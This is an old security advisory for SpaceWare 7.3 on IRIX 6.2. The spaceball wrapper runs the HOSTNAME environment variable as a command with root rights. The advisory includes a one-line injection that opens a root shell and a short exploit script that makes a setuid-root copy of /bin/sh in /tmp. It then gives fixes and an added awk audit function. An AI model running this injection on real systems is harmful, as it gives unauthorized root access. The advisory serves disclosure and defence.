COMMAND

    SpaceWare 7.3 v1.0

SYSTEMS AFFECTED

    IRIX 6.2 (others?)

PROBLEM

    J.A. Gutierrez found the following.  If you're playing with
    SpaceBall, you'll now find out how you can play even more.  You can
    use HOSTNAME to run any command you want as root, like:

    echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball

    Exploit follows:

    #!/bin/sh

    SWDIR=/usr/local/SpaceWare
    cp /bin/sh /tmp/sh

    echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
    $SWDIR/spaceball > /dev/null 2>&1
    echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
    $SWDIR/spaceball > /dev/null 2>&1

    /tmp/sh

SOLUTION

    a) rm (since spaceball.sh does lots of nasty things, like running
       spaceball demos as root, this is probably the best solution)

    b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of
       $SWDIR/spaceball.sh
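
    A check for solution b), added here as an example and not part of
    the original advisory or of SpaceWare: it lists variables that a
    script expands as a command but never sets itself, which is the
    condition that lets HOSTNAME choose what runs.  The function name
    and the two sample scripts are constructed for illustration; the
    real contents of spaceball.sh are not shown on this page.

```shell
# Added example: list variables a script runs as commands but never sets
# itself. Heuristic line scan of a script on stdin, not a full shell parser.
audit_env_commands() {
    awk '
    /^[ \t]*#/ { next }                       # skip full-line comments
    {
        # 1. Record NAME=value assignments made by the script itself.
        rest = $0
        sub(/^[ \t]*(export[ \t]+)?/, "", rest)
        if (rest ~ /^[A-Za-z_][A-Za-z0-9_]*=/) {
            name  = substr(rest, 1, index(rest, "=") - 1)
            value = substr(rest, index(rest, "=") + 1) " "
            # NAME=${NAME:-default} still trusts the caller: not pinned.
            if (value !~ ("[$][{]?" name "[^A-Za-z0-9_]")) pinned[name] = 1
        }
        # 2. Record $NAME where the shell expects a command word: start of
        #    line, or after ; | & ( or a backtick.
        line = ";" $0
        while (match(line, /[;|&`(][ \t]*[$][{]?[A-Za-z_][A-Za-z0-9_]*/)) {
            word = substr(line, RSTART, RLENGTH)
            sub(/^[^$]*[$][{]?/, "", word)
            if (!(word in used)) used[word] = NR
            line = substr(line, RSTART + RLENGTH)
        }
    }
    END { for (v in used) if (!(v in pinned)) print v " (line " used[v] ")" }
    ' | sort
}

# Constructed stand-ins for a wrapper's "Utilities" section. These are
# assumptions for illustration, not the contents of the real spaceball.sh.
sample_unpinned() {
    cat <<'EOF'
ECHO=/bin/echo
NODE=`$HOSTNAME`
$ECHO "running on $NODE"
EOF
}
sample_pinned() {
    cat <<'EOF'
ECHO=/bin/echo
HOSTNAME=/usr/bsd/hostname
NODE=`$HOSTNAME`
$ECHO "running on $NODE"
EOF
}

echo "unpinned: $(sample_unpinned | audit_env_commands)"
echo "pinned:   $(sample_pinned | audit_env_commands)"
```

    To audit a real script, feed it on stdin, for example
    audit_env_commands < $SWDIR/spaceball.sh; an empty result means
    every command variable the scan found is set by the script itself.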